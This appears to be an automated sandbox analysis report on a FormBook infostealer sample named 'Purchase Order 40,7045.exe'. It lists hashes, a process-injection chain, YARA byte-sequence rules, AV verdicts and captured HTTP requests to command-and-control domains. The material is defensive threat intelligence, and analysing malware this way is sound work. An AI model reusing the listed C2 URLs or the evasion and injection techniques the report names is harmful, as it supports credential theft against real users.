Play interactive tour

Edit tour

Analysis Report Purchase Order 40,7045.exe

Overview

General Information

Sample Name:	Purchase Order 40,7045.exe
Analysis ID:	321387
MD5:	2566aac2faf57e27d8778f2c61bac6d3
SHA1:	b163ec807fe59a0f85f2d964fe1e8ffa8adab77e
SHA256:	7d4d5ddf016f84445c94bf5ee4d715be092f8711b70ebd17f48f2956fba0487d
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Purchase Order 40,7045.exe (PID: 6916 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045.exe' MD5: 2566AAC2FAF57E27D8778F2C61BAC6D3)

Purchase Order 40,7045.exe (PID: 6932 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045.exe MD5: 2566AAC2FAF57E27D8778F2C61BAC6D3)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

netsh.exe (PID: 6984 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

cmd.exe (PID: 5700 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15289:$sqlite3step: 68 34 1C 7B E1 0x1539c:$sqlite3step: 68 34 1C 7B E1 0x152b8:$sqlite3text: 68 38 2A 90 C5 0x153dd:$sqlite3text: 68 38 2A 90 C5 0x152cb:$sqlite3blob: 68 53 D8 7F 8C 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.Purchase Order 40,7045.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Purchase Order 40,7045.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Purchase Order 40,7045.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15289:$sqlite3step: 68 34 1C 7B E1 0x1539c:$sqlite3step: 68 34 1C 7B E1 0x152b8:$sqlite3text: 68 38 2A 90 C5 0x153dd:$sqlite3text: 68 38 2A 90 C5 0x152cb:$sqlite3blob: 68 53 D8 7F 8C 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: Purchase Order 40,7045.exe	Virustotal: Detection: 40%			Perma Link
Source: Purchase Order 40,7045.exe	ReversingLabs: Detection: 33%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Purchase Order 40,7045.exe

Joe Sandbox ML: detected

Source: 0.2.Purchase Order 40,7045.exe.7f0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 13.248.196.204:80 -> 192.168.2.3:49750
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49752

Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.trafegopago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1Host: www.coveloungewineandwhiskey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.covid19salivatestdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.primeworldgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.hyx20140813.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1Host: www.obsessingwealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.cashintl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1Host: www.namofast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.plantpowered.energyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.capitalcitybombers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 160.153.136.3 160.153.136.3

Source: Joe Sandbox View	ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.trafegopago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
